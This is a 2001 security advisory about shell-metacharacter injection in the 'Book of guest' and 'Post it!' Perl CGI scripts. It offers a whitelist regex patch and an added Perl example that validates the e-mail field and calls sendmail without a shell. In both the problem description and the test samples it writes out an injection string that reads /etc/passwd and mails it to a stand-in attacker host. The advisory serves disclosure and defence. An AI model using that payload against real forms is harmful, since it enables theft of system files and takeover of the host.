
Book of guest & Post it!
2nd Nov 2001 [SBWID-4837]
COMMAND

	Book of guest & Post it!

SYSTEMS AFFECTED

	

PROBLEM

	David Kumme found the following in Seth Leonard's Book of guests and Post
	it! CGIs, available at http://www.dreamcatchersweb.com/scripts/.
	

	The problem is that the script doesn't filter any shell metacharacters
	out of the input and passes it to the shell. Therefore, by writing
	something like email@mail.com;cat /etc/passwd|mail evil@evilhost.com into
	the email field, an attacker could take control of the host.
	

	

SOLUTION

	patch:
	

	First of all, it isn't a bad idea to set the permissions of the script
	correctly. Furthermore, the line

		if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... }

	should be replaced by something like

		if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

	so that only word characters, dots and hyphens are accepted on either
	side of the "@" and anything the shell could interpret (";", "|", spaces,
	backticks) fails the check before it is used.
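An added example (not code from the original scripts or the advisory) showing the whitelist check from the patch applied in a small Perl handler; the sendmail path and the list-form open() are assumptions about how the notification is sent, since the advisory does not show the script's own code.

```perl
#!/usr/bin/perl
# Added example, not the original Book of guest / Post it! code: a whitelist
# check for the e-mail field, as suggested in the advisory, plus a way of
# invoking sendmail that never passes the value through a shell.
use strict;
use warnings;

# Accept only word characters, dots and hyphens on both sides of the "@".
# Anything else (";", "|", spaces, backticks, ...) fails the match, so it
# never reaches a shell even if a later line still interpolates it.
sub valid_email {
    my ($email) = @_;
    return (defined $email && $email =~ /^[\w.-]+\@[\w.-]+$/) ? 1 : 0;
}

# Safe way to hand the address to sendmail: the list form of open() execs
# the program directly, so metacharacters in $email are never interpreted.
# (The sendmail path is an assumption; adjust it for the target system.)
sub send_notification {
    my ($email, $body) = @_;
    die "rejected address\n" unless valid_email($email);
    open(my $mail, '|-', '/usr/sbin/sendmail', '-t') or die "sendmail: $!";
    print $mail "To: $email\nSubject: guestbook entry\n\n$body\n";
    close($mail) or die "sendmail exited with status $?\n";
    return 1;
}

# Constructed inputs: a normal address and the advisory's injection string.
my @samples = (
    'email@mail.com',
    'email@mail.com;cat /etc/passwd|mail evil@evilhost.com',
);
for my $s (@samples) {
    printf "%-60s %s\n", $s, valid_email($s) ? 'accepted' : 'rejected';
}
```

The loop prints "accepted" for the first sample and "rejected" for the second; send_notification() dies before touching sendmail for the rejected one.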
	

	
